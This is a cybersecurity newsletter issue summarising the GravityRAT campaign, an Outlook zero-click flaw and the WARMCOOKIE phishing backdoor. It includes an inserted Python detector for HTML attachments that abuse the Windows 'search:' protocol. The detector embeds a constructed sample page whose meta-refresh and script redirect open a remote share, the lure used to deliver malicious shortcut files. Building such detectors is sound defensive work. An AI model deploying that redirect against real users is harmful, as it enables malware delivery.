Jun 13 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that's reeling in the latest threats hook, line, and sinker!
Today's hottest cybersecurity news stories:
Android, Windows, Mac users beware! Pakistani malware lurks
Microsoft Outlook flaw discovered that would allow zero-click attack
Phishermen are using WARMCOOKIE as bait in backdoor campaign
Threat actors tied to Pakistan have been orchestrating a malware campaign called Operation Celestial Force since 2018. This campaign uses Android malware GravityRAT and Windows malware loader HeavyLift, managed via GravityAdmin.
Meet Cosmic Leopard
Cisco Talos tracks this adversary under the name Cosmic Leopard (aka SpaceCobra), showing tactical overlap with Transparent Tribe. The malware suite targets users in the Indian subcontinent, highlighting its success and ongoing evolution.
Multi-platform Threat
GravityRAT, first detected in 2018 as a Windows malware, now targets Android and macOS. It has been used to harvest sensitive info from military personnel in India and Pakistan Air Force, disguised as cloud storage, entertainment, and chat apps.
Coordinated Attacks
Cosmic Leopard employs spear-phishing and social engineering to lure targets into downloading GravityRAT or HeavyLift. GravityAdmin coordinates these attacks, with campaigns like 'FOXTROT' and 'CRAFTWITHME' marking specific operations.
HeavyLift's Role
HeavyLift, a new addition, targets Windows systems via malicious installers. It gathers system data and checks a C2 server for new payloads, functioning similarly on macOS.
Targeting Defense and Government
This campaign mainly targets Indian defence, government, and tech sectors. Researchers emphasise the sophistication and long-term persistence of this operation.
Stay alert and secure!
Whether you're starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.
Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.
Instantly calculate how much time you can save with Vanta.
A serious zero-click remote code execution (RCE) vulnerability, CVE-2024-30103, has been discovered in Microsoft Outlook. This flaw allows attackers to run arbitrary code via a specially designed email, with no user interaction needed.
Zero-Click Danger
CVE-2024-30103 is alarming because it doesn't require any action from the user. Just opening the malicious email is enough to compromise the system, making it a potent tool for cybercriminals.
How It Works
Morphisec's analysis reveals that the vulnerability exploits the way Outlook processes certain email components. A buffer overflow is triggered when the crafted email is opened, allowing the attacker to execute arbitrary code with the user's privileges. This can lead to full system compromise, data theft, or malware spread.
Widespread Impact
With Microsoft Outlook's extensive use in both corporate and personal environments, CVE-2024-30103 poses a significant risk. Successful exploits could result in major data breaches, financial losses, and reputational damage for organisations.
Mitigation Steps
Microsoft has released a security patch to fix this issue. Users and administrators should immediately apply the latest updates. Enhanced email filtering and monitoring solutions are also recommended to detect and block malicious emails.
Expert Advice
"Zero-click vulnerabilities are particularly dangerous due to their lack of user interaction," a Morphisec spokesperson noted. "Organisations must prioritise patching and adopt multi-layered security measures to defend against sophisticated threats."
Stay Informed and Protected
As of now, no known attacks exploiting CVE-2024-30103 are in the wild. Ensure your systems are updated and secure to mitigate risks from this critical vulnerability.
Cybersecurity researchers have uncovered a phishing campaign using job-themed lures to deliver a Windows backdoor named WARMCOOKIE. This backdoor scouts victim networks to deploy additional payloads.
How It Works
Emails from fake recruitment firms like Hays and Michael Page prompt recipients to click a link for job details. After solving a CAPTCHA, a JavaScript file is dropped, initiating the download of WARMCOOKIE via PowerShell.
Capabilities and Tactics
WARMCOOKIE fingerprints infected machines, captures screenshots, and drops more malicious programs. It uses a hard-coded command-and-control IP address and RC4 key for communication. The attack is tracked as REF6127.
Technical Breakdown
The phishing URL, hosted on compromised infrastructure, redirects victims to a landing page.
The backdoor establishes persistence using a scheduled task and performs anti-analysis checks to avoid detection.
WARMCOOKIE's functions include reading/writing files, executing commands via cmd.exe, fetching installed applications, and taking screenshots. It resembles tools used in prior campaigns targeting various sectors.
Global Reach
WARMCOOKIE is gaining popularity, targeting users worldwide. It's part of sophisticated phishing campaigns exploiting familiar job recruitment themes to lure victims.
Related Campaigns
Trustwave SpiderLabs detailed another campaign using invoice-themed decoys and Windows search functionality in HTML code to deploy malware. The emails contain a ZIP file with an HTML that exploits the "search:" protocol, displaying a Shortcut (LNK) file that can trigger malicious operations when clicked.
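For defenders who want to catch the "search:" trick described above at the mail gateway, here is an added example (our own illustration, not Trustwave's or SpiderLabs' tooling) that unpacks a ZIP attachment, inspects any HTML inside it, and flags links, meta-refresh redirects or inline-script redirects that use the Windows "search:" / "search-ms:" protocol handler, reporting whether the search location points at a remote share. The sample attachment, the 203.0.113.10 address and the file name invoice.html are all constructed for the demo.

```python
"""Flag HTML attachments that abuse the Windows "search:" / "search-ms:" protocol.

Added detection example; the ZIP, HTML and addresses below are constructed.
"""
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote

SEARCH_SCHEMES = ("search:", "search-ms:")


class _UriCollector(HTMLParser):
    """Collect every URI-bearing attribute, meta-refresh target and script redirect."""

    def __init__(self):
        super().__init__()
        self.uris = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        for key in ("href", "src", "action"):
            if attrs.get(key):
                self.uris.append(attrs[key])
        # <meta http-equiv="refresh" content="0; url=search:..."> fires without a click
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", attrs.get("content", ""), re.I)
            if m:
                self.uris.append(m.group(1).strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            # window.location = 'search:...' style redirects inside inline scripts
            self.uris.extend(
                re.findall(r"""['"]((?:search|search-ms):[^'"]*)['"]""", data, re.I)
            )


def find_search_uris(html):
    """Return a list of {uri, locations, remote} for every search: URI in the HTML."""
    parser = _UriCollector()
    parser.feed(html)
    hits = []
    for raw in parser.uris:
        uri = unquote(raw).strip()
        if not uri.lower().startswith(SEARCH_SCHEMES):
            continue
        # crumb=location:<path> tells Explorer where to search; a UNC path or
        # http(s) URL means the "results" (e.g. an LNK) come from outside the host
        params = parse_qs(uri.split(":", 1)[1])
        locations = [
            c[len("location:"):]
            for c in params.get("crumb", [])
            if c.lower().startswith("location:")
        ]
        remote = any(
            loc.startswith("\\\\") or loc.lower().startswith(("http://", "https://"))
            for loc in locations
        )
        hits.append({"uri": uri, "locations": locations, "remote": remote})
    return hits


def scan_zip(zip_bytes):
    """Scan every .htm/.html member of a ZIP attachment; returns {member: hits}."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".html", ".htm")):
                hits = find_search_uris(zf.read(name).decode("utf-8", "replace"))
                if hits:
                    findings[name] = hits
    return findings


# Constructed sample: an "invoice" HTML that redirects Explorer to a remote share.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=Invoice&crumb=location:\\\\203.0.113.10\\share&displayname=Downloads">
</head><body>
<script>window.location.href = 'search:query=Invoice&crumb=location:%5C%5C203.0.113.10%5Cshare';</script>
<a href="https://example.invalid/invoice">View invoice</a>
</body></html>"""


def build_sample_zip():
    """Build the constructed ZIP attachment in memory (no files touched on disk)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.html", SAMPLE_HTML)
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_zip(build_sample_zip()).items():
        for hit in hits:
            print(member, "remote" if hit["remote"] else "local", hit["locations"])
```

The ordinary https link is ignored; only the two search-protocol redirects are reported, each with its remote UNC location, which is the signal worth blocking or quarantining on.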
Stay Vigilant
While these attacks need user interaction, they cleverly exploit trust in familiar interfaces. Be cautious with email attachments and links, especially from unknown sources.
Stay alert and protect your systems!
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders.
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future
Let us know what you think.
So long and thanks for reading all the phish!